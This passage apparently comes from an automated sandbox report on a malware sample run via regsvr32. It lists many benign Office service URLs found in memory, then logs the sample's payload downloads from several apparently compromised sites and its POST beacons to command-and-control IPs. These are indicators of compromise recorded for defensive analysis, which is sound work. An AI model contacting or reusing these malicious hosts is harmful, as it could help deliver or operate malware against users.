              Source: regsvr32.exe, 0000000A.00000003.1927693196.0000000000C0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.63.99.23:7080/tkafmhcgcid/8eM
              Source: regsvr32.exe, 0000000A.00000003.1927257389.0000000000C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.63.99.23:7080/tkafmhcgcid/~G
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.aadrm.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.aadrm.com/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.cortana.ai
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.diagnostics.office.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.microsoftstream.com/api/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.office.net
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.onedrive.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://api.scheduler.
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://apis.live.net/v5.0/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://augloop.office.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://augloop.office.com/v2
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://cdn.entity.
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://clients.config.office.net/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://config.edge.skype.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://cortana.ai
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://cortana.ai/api
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://cr.office.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://dataservice.o365filtering.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://dataservice.o365filtering.com/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://dev.cortana.ai
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://devnull.onenote.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://directory.services.
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://enrichment.osi.office.net/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601292631425
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://fpastorage.cdn.office.net/%s
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://graph.ppe.windows.net
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://graph.ppe.windows.net/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://graph.windows.net
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://graph.windows.net/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://incidents.diagnostics.office.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://invites.office.com/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://lifecycle.office.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://login.microsoftonline.com/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://login.windows.local
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://management.azure.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://management.azure.com/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://messaging.action.office.com/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://messaging.engagement.office.com/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://messaging.office.com/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://ncus.contentsync.
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://ncus.pagecontentsync.
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://officeapps.live.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://onedrive.live.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://onedrive.live.com/embed?
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://osi.office.net
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://otelrules.azureedge.net
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://outlook.office.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://outlook.office.com/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://outlook.office365.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://outlook.office365.com/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://pages.store.office.com/review/query
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://powerlift.acompli.net
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://roaming.edog.
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://settings.outlook.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://shell.suite.office.com:1443
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://skyapi.live.net/Activity/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://staging.cortana.ai
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://store.office.cn/addinstemplate
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://store.office.de/addinstemplate
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://tasks.office.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://web.microsoftstream.com/video/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://webshell.suite.office.com
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://wus2.contentsync.
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://wus2.pagecontentsync.
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
              Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drString found in binary or memory: https://www.odwebp.svc.ms
              Source: unknownHTTP traffic detected: POST /tkafmhcgcid/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 284Host: 182.162.143.56
              Source: unknownDNS traffic detected: queries for: datie-tw.com
              Source: global trafficHTTP traffic detected: GET /img/O8G0RDZj7MYCuJyPoP/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: datie-tw.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /cgi-bin/WFFcGx/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: copunupo.ac.zmConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /upload/VaOfWEb3pW76UO/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sbm.xinmoshiwang.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wp-admin/4cChao/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ly.yjlianyi.topConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 175.98.167.165:443 -> 192.168.2.3:49697 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 41.63.0.22:443 -> 192.168.2.3:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49712 version: TLS 1.2
